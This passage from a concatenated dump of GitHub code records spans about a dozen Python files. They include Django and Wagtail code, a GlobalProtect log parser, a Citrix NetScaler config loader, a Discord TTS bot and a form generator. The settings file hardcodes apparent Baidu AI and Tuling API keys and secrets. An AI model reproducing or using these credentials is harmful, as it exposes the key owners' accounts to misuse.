绘制散点图\npyplot.show()\n","repo_name":"pitifulboy/machinelearning","sub_path":"1128.py","file_name":"1128.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30899452269","text":"from cms.models.pages import (\n BlogIndexPage, EventIndexPage, HomePage, IndexPage, NewsIndexPage,\n PastEventIndexPage, RichTextPage, StrandPage, _paginate, TagResults\n)\nfrom django.test import RequestFactory, TestCase\nfrom wagtail.tests.utils import WagtailPageTests\n\n\nclass TestPages(TestCase):\n\n def test__paginate(self):\n items = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17]\n\n factory = RequestFactory()\n\n request = factory.get('/test?page=1')\n self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7, 8, 9],\n _paginate(request, items).object_list)\n request = factory.get('/test?page=2')\n self.assertEqual([10, 11, 12, 13, 14, 15, 16, 17],\n _paginate(request, items).object_list)\n request = factory.get('/test?page=10')\n self.assertEqual([10, 11, 12, 13, 14, 15, 16, 17],\n _paginate(request, items).object_list)\n request = factory.get('/test?page=a')\n self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7, 8, 9],\n _paginate(request, items).object_list)\n\n\nclass TestHomePage(WagtailPageTests):\n fixtures = ['tests.json']\n\n def test_subpage_types(self):\n self.assertAllowedSubpageTypes(\n HomePage, {\n BlogIndexPage,\n EventIndexPage,\n IndexPage,\n NewsIndexPage,\n PastEventIndexPage,\n RichTextPage,\n StrandPage,\n TagResults\n })\n\n\nclass TestIndexPage(WagtailPageTests):\n fixtures = ['tests.json']\n\n def test_subpage_types(self):\n self.assertAllowedSubpageTypes(IndexPage, {IndexPage, RichTextPage})\n\n\nclass TestRichTextPage(WagtailPageTests):\n fixtures = ['tests.json']\n\n def test_subpage_types(self):\n self.assertAllowedSubpageTypes(RichTextPage, {})\n","repo_name":"kingsdigitallab/languageacts-django","sub_path":"cms/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"23828219680","text":"from django.shortcuts import render, HttpResponse\nfrom django.views import generic\nfrom rest_framework import generics\nfrom .serializers import OrderSerializer, VueOrderSerializer, UploadFileSerializer\nfrom .models import Orders, VueOrders, UploadFiles\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom django.http import JsonResponse\n\n\n# Create your views here.\n\ndef index(request):\n return render(request, \"index.html\", {})\n\nclass HomePage(generic.View):\n\n def get(self, *args, **kwargs):\n\n context = {\n\n }\n\n\n return render(self.request, \"index.html\", context)\n\n def post(self, *args, **kwargs):\n pass\n\nclass OrderUpload(generic.CreateView):\n model = Orders\n fields = [\"topic\", \"pages\", \"style\", \"subject\", \"amount\", \"instructions\", \"uploads\"]\n template_name = \"order_Upload.html\"\n\n\nclass OrderList(generics.ListCreateAPIView):\n queryset = Orders.objects.all()\n serializer_class = OrderSerializer\n\n\nclass OrderDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Orders.objects.all()\n serializer_class = OrderSerializer\n\nclass OrderdetailApi(generics.ListCreateAPIView):\n queryset = VueOrders.objects.all()\n serializer_class = VueOrderSerializer \n\n def create(self, request):\n print(request.data)\n\n deadline = request.data[\"body\"][\"deadline\"]\n Type = request.data[\"body\"][\"type\"]\n pages = request.data[\"body\"][\"pages\"]\n service = request.data[\"body\"][\"service\"]\n checkbox = request.data[\"body\"][\"checkbox\"]\n language = request.data[\"body\"][\"language\"]\n level = request.data[\"body\"][\"level\"]\n\n qs = self.queryset.create(\n deadline= deadline,\n Type = Type,\n pages = pages,\n service =service,\n fin_earl = checkbox,\n language = language,\n Level = level \n \n )\n\n\n data = {\n \"posted\": True,\n \"qs\": qs.id\n }\n return JsonResponse(data)\n\nclass OrderdetaildraftApi(APIView):\n queryset = VueOrders.objects.all()\n serializer_class = VueOrderSerializer \n\n def put(self, request, pk):\n print(request.data)\n\n deadline = request.data[\"body\"][\"deadline\"]\n Type = request.data[\"body\"][\"type\"]\n pages = request.data[\"body\"][\"pages\"]\n service = request.data[\"body\"][\"service\"]\n checkbox = request.data[\"body\"][\"checkbox\"]\n language = request.data[\"body\"][\"language\"]\n level = request.data[\"body\"][\"level\"]\n\n qs = self.queryset.get(id=pk)\n qs.qdeadline= deadline\n qs.Type = Type\n qs.pages = pages\n qs.service =service\n qs.fin_earl = checkbox\n qs.language = language \n qs.Level = level\n\n qs.save()\n \n data = {\n \"posted\": True,\n \"qs\": qs.id\n }\n return JsonResponse(data)\n\n\n def get(self, request, pk):\n\n order = self.queryset.get(id=pk)\n\n data = {\n \"deadline\": order.deadline,\n \"type\": order.Type,\n \"pages\": order.pages,\n \"service\": order.service,\n \"checkbox\": order.fin_earl,\n \"language\": order.language,\n \"level\": order.Level\n }\n # data = {\"form\" : form}\n\n return JsonResponse(data)\n \n def delete(self, request, pk):\n order = VueOrders.objects.get(id=pk).delete()\n data = {\n \"deleted\": True\n }\n return JsonResponse(data)\n\nclass OrderIntructionsApi(generics.ListCreateAPIView):\n queryset = VueOrders.objects.all()\n serializer_class = VueOrderSerializer \n\n def create(self, request, pk):\n print(request.data)\n\n pk_id = request.data[\"body\"][\"id\"]\n topic = request.data[\"body\"][\"form\"][\"topic\"]\n sources = request.data[\"body\"][\"form\"][\"sources\"]\n style = request.data[\"body\"][\"form\"][\"style\"]\n subject = request.data[\"body\"][\"form\"][\"subject\"]\n instructions = request.data[\"body\"][\"form\"][\"instructions\"]\n\n \n try:\n\n qs = self.queryset.get(id=pk)\n qs.topic = topic\n qs.sources = sources\n qs.style = style\n qs.subject = subject\n qs.instructions = instructions\n qs.save()\n \n\n data = {\n \"posted\": True\n }\n except:\n\n data = {\n \"posted\": False\n }\n\n \n\n return JsonResponse(data)\n\n\n def get(self, request, pk):\n\n order = self.queryset.get(id=pk)\n\n data = {\n \"topic\" :order.Topic,\n \"sources\" :order.sources,\n \"style\" :order.style,\n \"subject\":order.subject,\n \"instructions\":order.instructions\n }\n # data = {\"form\" : form}\n\n return JsonResponse(data)\n \n def delete(self, request, pk):\n order = VueOrders.objects.get(id=pk).delete()\n data = {\n \"deleted\": true\n }\n return JsonResponse(data)\n\n\n\ndef serializer(img):\n img_se = {\n 'file':img.files.name,\n 'main': img.main\n }\n return img_se\n\nclass OrderUploadApi(APIView):\n queryset = UploadFiles.objects.all()\n\n serializer_class = UploadFileSerializer\n\n def post(self, request,pk):\n print(request.data)\n data = request.data\n fies = []\n order = VueOrders.objects.get(id=pk)\n\n\n file_name = data.keys()\n\n for img in file_name:\n img = data[img]\n print(img)\n uploads = self.queryset.create(files = img)\n order.files.add(uploads)\n\n order.save()\n\n data = {\n\n \"posted\": True\n }\n\n return JsonResponse(data)\n\n\n def get(self, request, pk):\n order = VueOrders.objects.get(id=pk)\n images = order.files.all()\n serialized = [serializer(img) for img in images ]\n data = {\n\n \"order\" : serialized\n }\n\n return JsonResponse(data)\n \n def delete(self, request, pk):\n order = VueOrders.objects.get(id=pk).delete()\n data = {\n \"deleted\": true\n }\n return JsonResponse(data)\n\n\nclass HelloView(APIView):\n \n permission_classes = (IsAuthenticated,)\n\n def get(self, request):\n content = {'message': 'Hello, World!'}\n return Response(content)\n\n","repo_name":"vmisiko/Essaygenius","sub_path":"EssayGenius/Home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27777518881","text":"import os\nimport textwrap\nimport xml.etree.ElementTree as ET\n\nfrom scripts.artifact_report import ArtifactHtmlReport\nfrom scripts.cleapfuncs import logfunc, logdevinfo, tsv, timeline, is_platform_windows, get_next_unused_name, open_sqlite_db_readonly, get_browser_name\n\ndef get_paloAltoGlobalProtect(files_found, report_folder, seeker, wrap_text):\n for file_found in files_found:\n data_list = []\n file_found = str(file_found)\n if 'pan_gp_hrpt.xml' in file_found.lower():\n tree = ET.parse(file_found)\n root = tree.getroot()\n for elem in root.iter():\n if elem.text is not None and '\\t' not in elem.text and '\\n' not in elem.text:\n data_list.append((elem.tag, elem.text))\n \n if len(data_list) > 0:\n report = ArtifactHtmlReport('Palo Alto Global Protect Hip Report')\n report.start_artifact_report(report_folder, 'Palo Alto Global Protect Hip Report')\n report.add_script()\n data_headers = ('Key','Value')\n report.write_artifact_data_table(data_headers, data_list, file_found, html_escape=False)\n report.end_artifact_report()\n\n tsvname = 'Palo Alto Global Protect Hip Report'\n tsv(report_folder, data_headers, data_list, tsvname)\n\n else:\n logfunc('No Palo Alto Global Protect Hip Report Data available')\n\n if 'pan_gp_event.log' in file_found.lower():\n with open(file_found, \"r\") as logfile:\n for line in logfile:\n logline = line.split(\"[\")\n data_list.append((logline[0], \"[\" + logline[1]))\n\n if len(data_list) > 0:\n report = ArtifactHtmlReport('Palo Alto Global Protect Event Log')\n report.start_artifact_report(report_folder, 'Palo Alto Global Protect Event Log')\n report.add_script()\n data_headers = ('Date/Time', 'Event Message')\n report.write_artifact_data_table(data_headers, data_list, file_found, html_escape=False)\n report.end_artifact_report()\n\n tsvname = 'Palo Alto Global Protect Event Log'\n tsv(report_folder, data_headers, data_list, tsvname)\n\n else:\n logfunc('No Palo Alto Global Protect Event Log Data available')\n\n","repo_name":"markmckinnon/cLeapp","sub_path":"scripts/artifacts/paloAltoGlobalProtect.py","file_name":"paloAltoGlobalProtect.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"27"} +{"seq_id":"8077419641","text":"import logging\nfrom typing import List\n\nfrom pipeline.component_framework.component import Component\nfrom pipeline.core.flow.activity import Service\n\nimport backend.flow.utils.name_service.name_service_dataclass as flow_context\nfrom backend.db_services.plugin.nameservice import clb, polaris\nfrom backend.flow.plugins.components.collections.common.base_service import BaseService\n\nlogger = logging.getLogger(\"json\")\n\n\nclass ExecNameServiceOperation(BaseService):\n \"\"\"\n NameServiceCreate服务\n \"\"\"\n\n def _execute(self, data, parent_data) -> bool:\n \"\"\"\n 执行创建名字服务功能的函数\n global_data 单据全局变量,格式字典\n kwargs 私有变量\n \"\"\"\n\n # 从流程节点中获取变量\n kwargs = data.get_one_of_inputs(\"kwargs\")\n name_service_operation_type = kwargs[\"name_service_operation_type\"]\n trans_data = data.get_one_of_inputs(\"trans_data\")\n creator = kwargs[\"creator\"]\n cluster_id = kwargs[\"cluster_id\"]\n\n if trans_data is None or trans_data == \"${trans_data}\":\n # 表示没有加载上下文内容,则在此添加\n trans_data = getattr(flow_context, kwargs[\"set_trans_data_dataclass\"])()\n\n # 执行功能\n # clb创建\n if name_service_operation_type == \"create_clb\":\n res = clb.create_lb_and_register_target(cluster_id=cluster_id)\n # polaris创建\n elif name_service_operation_type == \"create_polaris\":\n res = polaris.create_service_alias_bind_targets(cluster_id=cluster_id)\n # clb删除\n elif name_service_operation_type == \"delete_clb\":\n res = clb.deregister_target_and_delete_lb(cluster_id=cluster_id)\n # polaris删除\n elif name_service_operation_type == \"delete_polaris\":\n res = polaris.unbind_targets_delete_alias_service(kwargs[\"cluster_id\"])\n # clb信息写入meta\n elif name_service_operation_type == \"add_clb_info_to_meta\":\n res = clb.add_clb_info_to_meta(output=trans_data, cluster_id=cluster_id, creator=creator)\n # 从meta删除clb信息\n elif name_service_operation_type == \"delete_clb_info_from_meta\":\n res = clb.delete_clb_info_from_meta(output=trans_data, cluster_id=cluster_id)\n # polaris信息写入meta\n elif name_service_operation_type == \"add_polaris_info_to_meta\":\n res = polaris.add_polaris_info_to_meta(output=trans_data, cluster_id=cluster_id, creator=creator)\n # 从meta删除polaris信息\n elif name_service_operation_type == \"delete_polaris_info_from_meta\":\n res = polaris.delete_polaris_info_from_meta(output=trans_data, cluster_id=cluster_id)\n # 添加clb域名到dns,clb域名信息写入meta\n elif name_service_operation_type == \"add_clb_domain_to_dns\":\n res = clb.add_clb_domain_to_dns(cluster_id=cluster_id, creator=creator)\n # 从dns删除clb域名,从meta中删除clb域名信息\n elif name_service_operation_type == \"delete_clb_domain_from_dns\":\n res = clb.delete_clb_domain_from_dns(cluster_id=cluster_id)\n # 主域名绑定clb ip\n elif name_service_operation_type == \"domain_bind_clb_ip\":\n res = clb.immute_domain_clb_ip(cluster_id=cluster_id, creator=creator, bind=True)\n # 主域名解绑clb ip\n elif name_service_operation_type == \"domain_unbind_clb_ip\":\n res = clb.immute_domain_clb_ip(cluster_id=cluster_id, creator=creator, bind=False)\n else:\n self.log_error(\"{} does not support error!\".format(name_service_operation_type))\n return False\n\n # 定义流程节点输出参数值\n trans_data = res\n if res[\"code\"] == 0:\n self.log_info(\"task:{} execute successfully\".format(name_service_operation_type))\n data.outputs[\"trans_data\"] = trans_data\n return True\n\n self.log_error(\"task:{} execute fail, error:{}\".format(name_service_operation_type, res[\"message\"]))\n return False\n\n # 流程节点输入参数\n def inputs_format(self) -> List:\n return [\n Service.InputItem(name=\"kwargs\", key=\"kwargs\", type=\"dict\", required=True),\n Service.InputItem(name=\"global_data\", key=\"global_data\", type=\"dict\", required=True),\n ]\n\n\nclass ExecNameServiceOperationComponent(Component):\n \"\"\"\n ExecNameServiceOperation组件\n \"\"\"\n\n name = __name__\n code = \"name_service_operation\"\n bound_service = ExecNameServiceOperation\n","repo_name":"TencentBlueKing/blueking-dbm","sub_path":"dbm-ui/backend/flow/plugins/components/collections/name_service/name_service.py","file_name":"name_service.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"27"} +{"seq_id":"29413549984","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n \n dummy = ListNode()\n cur = dummy\n \n heap = []\n for ind, node in enumerate(lists):\n if node:\n heapq.heappush(heap, (node.val, ind))\n \n while heap:\n least, ind = heapq.heappop(heap)\n cur.next = lists[ind]\n cur = cur.next\n lists[ind] = lists[ind].next\n if lists[ind]:\n heapq.heappush(heap, (lists[ind].val, ind))\n \n cur.next = None\n \n return dummy.next\n \n ","repo_name":"million-t/competitive-programming","sub_path":"0023-merge-k-sorted-lists/0023-merge-k-sorted-lists.py","file_name":"0023-merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"18102554676","text":"import requests\r\nfrom datetime import datetime\r\n\r\ndef run_program():\r\n id_invoice = input(\"Masukkan ID Invoice: \")\r\n url = 'https://afvr.my.id/api/cek_status'\r\n data = {'id_invoice': id_invoice}\r\n\r\n headers = {'Content-type': 'application/x-www-form-urlencoded'}\r\n response = requests.post(url, headers=headers, data=data)\r\n\r\n result = response.json()\r\n\r\n if 'error' in result:\r\n print(result['error'])\r\n else:\r\n invoices = result['id_invoice']\r\n for invoice in invoices:\r\n print(\"===============================\")\r\n print(\"ID Invoice : \", invoice['id_invoice'])\r\n transaksi_tanggal = datetime.strptime(invoice['transaksi_tanggal'], '%Y-%m-%d %H:%M:%S')\r\n print(\"Tanggal : \", datetime.strftime(transaksi_tanggal, '%d %B %Y'))\r\n print(\"Jasa dipilih : \", invoice['nama_produk'])\r\n print(\"Nama Pelanggan : \", invoice['nama_konsumen'])\r\n print(\"Status : \", invoice['status_transaksi'])\r\n print(\"===============================\")\r\n\r\n command = input(\"Ketik 'jalankan' untuk menjalankan program atau 'berhenti' untuk berhenti (tekan enter jika sudah menuliskan perintah): \")\r\n if command == \"jalankan\":\r\n run_program()\r\n elif command == \"berhenti\":\r\n print(\"Program dihentikan.\")\r\n else:\r\n print(\"Perintah tidak dikenali. Program dihentikan.\")\r\n\r\nif __name__ == '__main__':\r\n run_program()\r\n","repo_name":"aji24ap/python-test-api-wp3","sub_path":"yo.py","file_name":"yo.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33129373415","text":"import discord\r\nfrom discord.ext import commands\r\nimport pyttsx3\r\n\r\n##initialize engine\r\nengine = pyttsx3.init()\r\n\r\n\r\n\r\nclass commandtts(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n \r\n ##tts\r\n @commands.command(aliases=[\"t\",\"speak\"])\r\n async def tts(self, ctx):\r\n ##0 ES-Helena, 1 EN-David, 2 EN-Zira, 3 EN-Hazel, 4 ES-Sabina, 5 JP-Haruka, 6 KR-Heami\r\n usrid = ctx.author.id\r\n usrname = ctx.author.name\r\n text = ctx.message.content\r\n voices = engine.getProperty('voices')\r\n rate = engine.getProperty('rate') # getting details of current speaking rate\r\n volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)\r\n\r\n print(f\"{usrname} said: {text[5:]}\")\r\n print (f\" current voice rate {rate}\") #printing current voice rate\r\n print (f\" current voice rate {volume}\")#printing current volume level\r\n\r\n engine.setProperty('voice', voices[4].id)\r\n engine.setProperty('rate', 250) # setting up new voice rate\r\n engine.setProperty('volume',1.5) # setting up volume level between 0 and 1\r\n \r\n ##if user is x set voice to helena\r\n # if usrid == exampleid:\r\n # engine.setProperty('voice', voices[0].id)\r\n \r\n\r\n\r\n ## save the mp3 file\r\n engine.save_to_file(text[5:], 'output.mp3')\r\n engine.runAndWait()\r\n #voice = discord.utils.get(client.voice_clients, guild=ctx.guild)\r\n voice = ctx.guild.voice_client\r\n voiceChannel = ctx.author.voice.channel\r\n \r\n if voice == None:\r\n await voiceChannel.connect()\r\n\r\n elif ctx.voice_client.is_playing():\r\n ctx.voice_client.stop()\r\n\r\n vc = ctx.voice_client\r\n vc.play(discord.FFmpegPCMAudio('output.mp3'), after=lambda e: print('done', e))\r\n\r\n\r\nasync def setup(bot):\r\n await bot.add_cog(commandtts(bot))","repo_name":"Ambiguousrelic/Ambidroid","sub_path":"ambibot/cogs/commandTTS.py","file_name":"commandTTS.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"32974773817","text":"import copy\nimport logging\nimport os.path as op\n\nfrom ta_conf import ta_conf_task as tct\nfrom ta_util2 import configure as conf\n\n_LOGGER = logging.getLogger(\"ta_citrix_netscaler\")\n\n\nclass CitrixNetscalerConfig:\n\n app_dir = op.dirname(op.dirname(op.abspath(__file__)))\n app_file = op.join(app_dir, \"local\", \"app.conf\")\n server_file = \"citrix_netscaler_servers.conf\"\n server_file_w_path = op.join(app_dir, \"local\", server_file)\n task_file = \"inputs.conf\"\n task_file_w_path = op.join(app_dir, \"local\", task_file)\n template_file = \"citrix_netscaler_templates.conf\"\n template_file_w_path = op.join(app_dir, \"local\", template_file)\n ucs_file = \"splunk_ta_citrix_netscaler_settings.conf\"\n ucs_file_w_path = op.join(app_dir, \"local\", ucs_file)\n ucs_default_file_w_path = op.join(app_dir, \"default\", ucs_file)\n signal_file_w_path = op.join(app_dir, \"local\", \".signal\")\n\n def __init__(self, meta_configs):\n self.metas = meta_configs\n self._conf_task = tct.TAConfTask(\n self.metas,\n self.server_file,\n self.template_file,\n self.task_file,\n self.ucs_file,\n )\n\n def encrypt_credentials(self):\n self._conf_task.encrypt_credentials()\n\n def get_tasks(\n self, inputs, ui_input_validator_args=None, ui_input_validator_logger=None\n ):\n \"\"\"\n Generate filter task for data collection based on endpoints\n\n :param inputs: (dict object) enabled input stanzas\n :param ui_input_validator_args: (tuple object) ui input arguments\n :param ui_input_validator_logger: (object) logging object\n :return:\n \"\"\"\n\n confs = (self.server_file, self.template_file, self.task_file, self.ucs_file)\n _LOGGER.info(\"Reloading configuration files\")\n conf.reload_confs(confs, self.metas[\"session_key\"], self.metas[\"server_uri\"])\n\n tasks = self._conf_task.get_tasks(inputs)\n\n is_ui_input_warning = False\n\n if ui_input_validator_args:\n tasks, ui_task_objs = self._separate_tasks(\n tasks, ui_input_validator_args[0]\n )\n\n filtered_tasks = []\n # Filtered endpoint based on task, if one task have serveral task\n # templates, and some of them have dup class ids, clean them up to\n # avoid dup data collection\n existing_endpoints = {}\n for task in tasks:\n\n content = task[\"content\"].strip()\n if not content:\n _LOGGER.warn(\n \"No api_endpoint specified for task={}, ignoring it\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\")\n )\n )\n continue\n (\n existing_endpoints,\n api_endpoints,\n is_ui_input_warning,\n ) = self._process_api_endpoints(\n task, content, existing_endpoints, ui_logger=None\n )\n filtered_tasks += self._create_filtered_tasks(task, api_endpoints)\n\n if ui_input_validator_args:\n\n for task in ui_task_objs:\n ui_task_content = task[\"content\"].strip()\n if not ui_task_content:\n _LOGGER.warn(\n \"No api_endpoint specified for task={}, ignore it\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\")\n )\n )\n continue\n (\n existing_endpoints,\n api_endpoints,\n is_ui_input_warning,\n ) = self._process_api_endpoints(\n task,\n ui_task_content,\n existing_endpoints,\n ui_logger=ui_input_validator_logger,\n )\n\n if is_ui_input_warning:\n return True\n else:\n return False\n\n return filtered_tasks\n\n def _process_api_endpoints(self, task, content, existing_endpoints, ui_logger=None):\n \"\"\"\n It will process endpoints of the task template and produce necessary warnings regarding data duplication\n\n :param task: (dict object) input task object\n :param content: (string) string of endpoints\n :param existing_endpoints: (dict object) map for previously configured endpoints\n :param ui_logger: (object) logging object\n :return:\n \"\"\"\n\n api_endpoints = []\n unique_api_endpoints = []\n is_ui_input_warning = False\n for endpoint in content.split(\";\"):\n endpoint = endpoint.strip()\n if not endpoint:\n continue\n\n # Creating a map for keeping record of unique api endpoints\n et = task[\"server_url\"] + \"``\" + endpoint\n if et not in existing_endpoints:\n existing_endpoints[et] = (\n endpoint,\n task[\"server_url\"],\n task[\"task_template\"],\n task[\"name\"],\n )\n unique_api_endpoints.append(endpoint)\n else:\n if ui_logger:\n\n # jscpd:ignore-start\n ui_logger.warn(\n \"While saving input [ task=({}), \"\n \"template=({}), appliance url=({}) ] \"\n \"from add-on UI, found duplicate endpoint=({}) \"\n \"configuraiton with [ task=({}), template=({}), appliance_url=({}) ],\"\n \"which may cause data duplication.\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\"),\n task[\"task_template\"].replace(\n self.metas[\"app_name\"] + \":\", \"\"\n ),\n task[\"server_url\"],\n endpoint,\n existing_endpoints[et][3].replace(\n \"citrix_netscaler://\", \"\"\n ),\n existing_endpoints[et][2].replace(\n self.metas[\"app_name\"] + \":\", \"\"\n ),\n existing_endpoints[et][1],\n )\n )\n is_ui_input_warning = True\n else:\n _LOGGER.warn(\n \"While filtering [ task=({}), template=({}), appliance url=({}) ] found \"\n \"api_endpoint=({}) already specified in \"\n \"[ task=({}), template=({}), appliance url=({}) will have data duplication.\"\n \"\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\"),\n task[\"task_template\"].replace(\n self.metas[\"app_name\"] + \":\", \"\"\n ),\n task[\"server_url\"],\n endpoint,\n existing_endpoints[et][3].replace(\n \"citrix_netscaler://\", \"\"\n ),\n existing_endpoints[et][2].replace(\n self.metas[\"app_name\"] + \":\", \"\"\n ),\n existing_endpoints[et][1],\n )\n )\n\n api_endpoints.append(endpoint)\n # jscpd:ignore-end\n if ui_logger:\n self._generate_all_duplicate_endpoints_warning(\n task, unique_api_endpoints, ui_logger\n )\n else:\n self._generate_all_duplicate_endpoints_warning(\n task, unique_api_endpoints, _LOGGER\n )\n\n return existing_endpoints, api_endpoints, is_ui_input_warning\n\n @staticmethod\n def _separate_tasks(tasks, input_name):\n \"\"\"\n It will separate tasks in two list\n (tasks matches the input name) & (tasks which does not matches the input name)\n\n :param tasks: (list) inputs task objects\n :param input_name: (string) name of input\n :return:\n \"\"\"\n return [task for task in tasks if task[\"name\"] != input_name], [\n task for task in tasks if task[\"name\"] == input_name\n ]\n\n @staticmethod\n def _create_filtered_tasks(task, api_endpoints):\n \"\"\"\n It will create filtered objects based on endpoints list\n\n :param task: (dict object) the input task object\n :param api_endpoints: (list) list of endpoints\n :return:\n \"\"\"\n filtered_tasks = []\n for endpoint in api_endpoints:\n dup = copy.deepcopy(task)\n dup[\"url\"] = dup[\"server_url\"]\n dup[\"username\"] = dup[\"account_name\"]\n dup[\"password\"] = dup[\"account_password\"]\n dup[\"duration\"] = int(dup[\"duration\"])\n dup[\"api_endpoint\"] = endpoint\n\n for k in (\"server_url\", \"account_name\", \"account_password\", \"content\"):\n del dup[k]\n filtered_tasks.append(dup)\n\n return filtered_tasks\n\n def _generate_all_duplicate_endpoints_warning(\n self, task, api_endpoints, logger=None\n ):\n \"\"\"\n It will log warning message\n :param task: (dict object) the input task object\n :param api_endpoints: (list) list of unique endpoints\n :param logger: (object)logging object\n :return:\n \"\"\"\n if not api_endpoints:\n logger.warn(\n \"All api endpoints in [ task=({}) , template=({}), appliance url=({}) ] \"\n \"duplicate with other tasks.\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\"),\n task[\"task_template\"].replace(self.metas[\"app_name\"] + \":\", \"\"),\n task[\"server_url\"],\n )\n )\n","repo_name":"asimchamp/Splunk_Apps","sub_path":"SplunkBase/2770_Splunk_Add-on_for_Citrix_NetScaler/8.2.1/Splunk_TA_citrix-netscaler/bin/citrix_netscaler_config.py","file_name":"citrix_netscaler_config.py","file_ext":"py","file_size_in_byte":10021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73298602311","text":"# 数据库配置\nimport pymongo\nclient = pymongo.MongoClient(host=\"127.0.0.1\",port=27017)\nMONGO_DB = client[\"TuXingSunDB\"]\n\nfrom redis import Redis\nREDIS_DB = Redis(host=\"127.0.0.1\",port=6379,db=15)\n\n\n# 目录配置\nMUSIC_PATH = \"Music\"\nIMAGE_PATH = \"Image\"\nVOICE_PATH = \"Voices\"\nCHAT_PATH = \"Chats\"\n\n# RET配置\nRET = {\n \"code\":0,\n \"msg\":\"调用接口成功\",\n \"data\":[]\n}\n\n# URL配置\nLT_URL = \"http://qr.liantu.com/api.php?text=%s\"\n\n\n# BaiduAI配置:\nfrom aip import AipSpeech,AipNlp\n\nAPP_ID = '15217111'\nAPI_KEY = 'jE38mGiHGGe8LnmK2YdbGGoX'\nSECRET_KEY = 'KaoFdHZoaUWQsmpRgIEgxIGhdkDbW2V4'\n\nSPEECH_CLIENT = AipSpeech(APP_ID, API_KEY, SECRET_KEY)\nNLP_CLIENT = AipNlp(APP_ID, API_KEY, SECRET_KEY)\n\nVOICE = {\n \"per\": 4,\n \"pit\": 8,\n \"spd\": 4,\n 'vol': 5,\n }\n\n# 图灵配置 :\nTL_URL = \"http://openapi.tuling123.com/openapi/api/v2\"\n\nTL_DATA = {\n\t\"reqType\":0,\n \"perception\": {\n \"inputText\": {\n \"text\": \"%s\"\n },\n },\n \"userInfo\": {\n \"apiKey\": \"c3a9ba0d958a43658a5acdcae50c13ae\",\n \"userId\": \"%s\"\n }\n}","repo_name":"ruoshuixuelabi/oldboyeduPython14qi","sub_path":"第9部分-flask+智能玩具(火龙果)/day128/今日代码/TuXingSun/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9954695415","text":"import inspect\nfrom collections import OrderedDict\nfrom decimal import Decimal\nfrom enum import Enum\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm.properties import ColumnProperty\nfrom sqlalchemy_utils import types\nfrom wtforms import (\n BooleanField,\n Field,\n FloatField,\n PasswordField,\n TextAreaField\n)\nfrom wtforms.widgets import CheckboxInput, TextArea\nfrom wtforms_components import (\n ColorField,\n DateField,\n DateIntervalField,\n DateTimeField,\n DateTimeIntervalField,\n DateTimeLocalField,\n DecimalField,\n DecimalIntervalField,\n EmailField,\n IntegerField,\n IntIntervalField,\n SelectField,\n StringField,\n TimeField\n)\nfrom wtforms_components.widgets import (\n ColorInput,\n DateInput,\n DateTimeInput,\n DateTimeLocalInput,\n EmailInput,\n NumberInput,\n TextInput,\n TimeInput\n)\n\nfrom .exc import (\n AttributeTypeException,\n InvalidAttributeException,\n UnknownTypeException\n)\nfrom .fields import CountryField, PhoneNumberField, WeekDaysField\nfrom .utils import (\n choice_type_coerce_factory,\n ClassMap,\n flatten,\n is_date_column,\n is_number,\n is_number_range,\n is_scalar,\n null_or_unicode,\n strip_string,\n translated_attributes\n)\n\n\nclass FormGenerator(object):\n \"\"\"\n Base form generator, you can make your own form generators by inheriting\n this class.\n \"\"\"\n\n # When converting SQLAlchemy types to fields this ordered dict is iterated\n # in given order. This allows smart type conversion of different inherited\n # type objects.\n TYPE_MAP = ClassMap((\n (sa.types.UnicodeText, TextAreaField),\n (sa.types.BigInteger, IntegerField),\n (sa.types.SmallInteger, IntegerField),\n (sa.types.Text, TextAreaField),\n (sa.types.Boolean, BooleanField),\n (sa.types.Date, DateField),\n (sa.types.DateTime, DateTimeField),\n (sa.types.Enum, SelectField),\n (sa.types.Float, FloatField),\n (sa.types.Integer, IntegerField),\n (sa.types.Numeric, DecimalField),\n (sa.types.Unicode, StringField),\n (sa.types.String, StringField),\n (sa.types.Time, TimeField),\n (sa.types.JSON, TextAreaField),\n (types.ArrowType, DateTimeField),\n (types.ChoiceType, SelectField),\n (types.ColorType, ColorField),\n (types.CountryType, CountryField),\n (types.DateRangeType, DateIntervalField),\n (types.DateTimeRangeType, DateTimeIntervalField),\n (types.EmailType, EmailField),\n (types.IntRangeType, 